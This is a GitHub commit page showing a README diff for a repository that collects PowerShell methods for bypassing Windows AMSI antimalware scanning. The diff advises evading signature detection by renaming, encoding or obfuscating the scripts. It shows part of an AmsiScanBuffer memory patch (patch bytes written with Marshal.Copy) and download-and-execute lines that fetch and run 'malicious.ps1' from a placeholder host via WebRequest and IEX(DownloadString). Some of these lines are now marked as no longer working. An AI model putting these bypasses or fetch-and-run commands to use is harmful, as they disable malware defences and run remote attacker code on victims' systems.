Skip to content

Commit

Permalink
Merge pull request #1 from S3cur3Th1sSh1t/master
Browse files Browse the repository at this point in the history 
Updated by Library Project Script . 20200715
  • Loading branch information
@wisdark
wisdark authored Jul 15, 2020
2 parents 2528781 + fd448d5 commit c07adb4
Showing 1 changed file with 4 additions and 4 deletions.
8 changes: 4 additions & 4 deletions README.md
View file
Original file line number Diff line number Diff line change
@@ -1,10 +1,10 @@
# Amsi-Bypass-Powershell #
This repo contains some Antimalware Scan Interface (AMSI) bypass / avoidance methods i found on different Blog Posts.

Some of the more well known Bypasses are detected by AMSI itself. So you have to obfuscate them via ISESteroids and or Invoke-Obfuscation to get them working. Generally obfuscation can be used as bypass for AMSI.
Most of the scripts are detected by AMSI itself. So you have to find the [trigger](https://github.com/RythmStick/AMSITrigger) and change the signature at the part via variable/function renaming, string replacement or encoding and decoding at runtime. Alternatively obfuscate them via ISESteroids and or Invoke-Obfuscation to get them working.

1. [Patching amsi.dll AmsiScanBuffer by rasta-mouse](#Patching-amsi.dll-AmsiScanBuffer-by-rasta-mouse "Goto Patching-amsi.dll-AmsiScanBuffer-by-rasta-mouse")
2. [Dont use net webclient](#Dont-use-net-webclient "Goto Dont-use-net-webclient")
2. [Dont use net webclient](#Dont-use-net-webclient "Goto Dont-use-net-webclient") - this one is not working anymore
3. [Amsi ScanBuffer Patch from -> https://www.contextis.com/de/blog/amsi-bypass](#Amsi-ScanBuffer-Patch "Goto Amsi-ScanBuffer-Patch")
4. [Forcing an error](#Forcing-an-error "Goto Forcing-an-error")
5. [Disable Script Logging](#Disable-Script-Logging "Goto Disable-Script-Logging")
Expand Down Expand Up @@ -49,7 +49,7 @@ $Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)
```

# Dont use net webclient #
# Dont use net webclient # - Not Working anymore, there was a patch for it

$webreq = [System.Net.WebRequest]::Create(‘https://maliciousscripturl/malicious.ps1’)

Expand All @@ -63,7 +63,7 @@ $Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)

IEX($content)

# The Short version of dont use powershell net webclient
# The Short version of dont use powershell net webclient - Not Working anymore, there was a patch for it
```
IEX([Net.Webclient]::new().DownloadString("https://maliciousscripturl/malicious.ps1"))
```
Expand Down

0 comments on commit c07adb4

Please sign in to comment.